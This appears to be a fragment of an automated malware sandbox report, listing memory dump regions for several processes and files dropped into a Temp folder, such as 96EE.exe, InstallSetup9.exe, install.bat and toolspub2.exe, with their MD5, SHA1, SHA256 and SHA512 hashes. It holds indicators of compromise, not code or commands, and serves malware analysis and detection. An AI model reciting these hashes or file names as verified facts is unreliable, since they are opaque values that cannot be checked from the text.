SHA512 446f2c8e50019d16bdaab8d28e5d97eb1ac48081671dcf1e648e494113ba28d64db4019ff445989c80cb7ee492b87fa2a203588ef3531975a57467f55edf734e

memory/3092-32-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/3092-33-0x0000000000860000-0x0000000000CFE000-memory.dmp

memory/3092-34-0x00000000058B0000-0x000000000594C000-memory.dmp

memory/3092-35-0x00000000058A0000-0x00000000058B0000-memory.dmp

memory/4472-36-0x0000000008850000-0x00000000088B6000-memory.dmp

memory/4472-37-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/4472-38-0x0000000009600000-0x0000000009650000-memory.dmp

memory/4472-39-0x0000000009820000-0x00000000099E2000-memory.dmp

memory/4472-40-0x0000000009F20000-0x000000000A44C000-memory.dmp

memory/3092-41-0x00000000061C0000-0x0000000006388000-memory.dmp

memory/3092-42-0x0000000007390000-0x0000000007522000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/3092-48-0x00000000058A0000-0x00000000058B0000-memory.dmp

memory/3092-51-0x00000000058A0000-0x00000000058B0000-memory.dmp

memory/3092-49-0x0000000005A90000-0x0000000005AA0000-memory.dmp

memory/3092-54-0x00000000058A0000-0x00000000058B0000-memory.dmp

memory/3092-53-0x00000000058A0000-0x00000000058B0000-memory.dmp

memory/3092-52-0x00000000058A0000-0x00000000058B0000-memory.dmp

memory/3092-55-0x00000000058A0000-0x00000000058B0000-memory.dmp

memory/3092-56-0x0000000007C00000-0x0000000007D00000-memory.dmp

memory/4472-57-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/3476-59-0x0000000000400000-0x000000000043C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\96EE.exe

MD5 1bb7a1ac32388a0523f41283b889eb6b
SHA1 50e27c56cc51c4bf8996162948471c9007868b8c
SHA256 0124a6bca637f02f8ed70f3f9cecd7886632e74369de512cf4e93dc8fcd77241
SHA512 4fa2515b5e70919fa03372b1d7dd4947dd089bd4a5460eb31f979c269ec9fac5121b371bd12a6d1daa9de9ac0a94321b2a5ad13765a32bad782c22f70f0473bd

C:\Users\Admin\AppData\Local\Temp\96EE.exe

MD5 63b1bcfbc87f2bdaef10f04c167372cd
SHA1 5e0b98b5e72b7cfd2b430a7f9bf49fcd5c2e1855
SHA256 b5999966647caa4a8e3a474adf73f5a09395b4b6df713935a38fde1b2b4e4ecd
SHA512 9d57bb5c32bc54db6a23bda74affaed041c4f3daabeb4990826f04639e3bc78372dc02ef28b781c76fef731f4f31eb7857be7a2f1278b57e61589c9d84819ea2

memory/3092-60-0x0000000007C00000-0x0000000007D00000-memory.dmp

memory/4472-66-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/3092-69-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/1340-67-0x0000000000460000-0x0000000001252000-memory.dmp

memory/3476-68-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/1340-64-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/3092-58-0x0000000007C00000-0x0000000007D00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

MD5 dc6fbf2cd9ad1f1f0ac200e9bec7ea3f
SHA1 c3af9d82d270829784339331dea63f927400e0d4
SHA256 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590
SHA512 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 152a3bfe4f72465da30300b38c3aa5ef
SHA1 71060622f392b6ed62e09388b6f458189f4a1285
SHA256 2a8ce8d51dbcca2c1861281c47d3f3b836de6a392eb01129af41fad1aa8aaf69
SHA512 4c1d8fe35c1fd70ef4821207203e346ac3c1d98dbffc8b8f908be5ee535eb40fda196b53faf714b96bb858f3a1d0763555d1adc804089fe8c890c4b0d85f4391

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat

MD5 60c9624e093baac4bef11ab4fc846111
SHA1 07a25911c81e04608a0dc6fb065524a9da82dd65
SHA256 e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d
SHA512 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 f39b447c4c7fee736a6154695216b66a
SHA1 5c7a989f6195cae8c6a4a223e623f0ebe4daf337
SHA256 b30cbc7494a0efcca4112de99470e839d7c663d2ed8d595f2479fcc9ca8ae569
SHA512 f812fb5db48b166e5f23caaa525b7bda9fe01d32a6fd02ffd04841609e33529fd0bc1b122faa79f39bc46dc1c4af0b8b2ce221bb0238ecffe926d76e3d0c6314

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 0ac4f98fe472a52ac2241772940f7c37
SHA1 fe15a570ff2ce6e8c311d402875bc357c999c957
SHA256 bd262eea3ffc095fbc6140c1f2acdc2a8653d1c35d0857652dd408177a32e316
SHA512 ca8f5fdfdd3846907ae6043a475b5581c7b097873ee9cbc1c70c564648db4717cd5086bc615b444b1e60a75043d965b03f320a9992bbd5d4de0e04d6b9ea9b25